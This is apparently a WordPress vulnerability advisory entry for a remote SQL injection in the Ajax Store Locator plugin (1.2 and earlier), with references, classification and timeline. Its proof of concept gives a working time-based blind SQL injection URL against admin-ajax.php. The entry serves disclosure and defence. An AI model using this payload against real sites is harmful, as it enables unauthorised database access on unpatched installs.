Ajax Store Locator <= 1.2 - Remote SQL Injection



Proof of Concept
http://www.example.com/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)

Affects Plugin

no known fix

References

ExploitDB 36777
PacketStorm 131464
URL http://www.homelab.it/index.php/2015/04/15/wordpress-ajax-store-locator-sql-injection-vulnerability/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter pvdl
Views 6603
Verified No
WPVDB ID 7907

Timeline

Publicly Published 2015-04-15 (about 5 years ago)
Added 2015-04-16 (about 5 years ago)
Last Updated 2019-10-21 (9 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin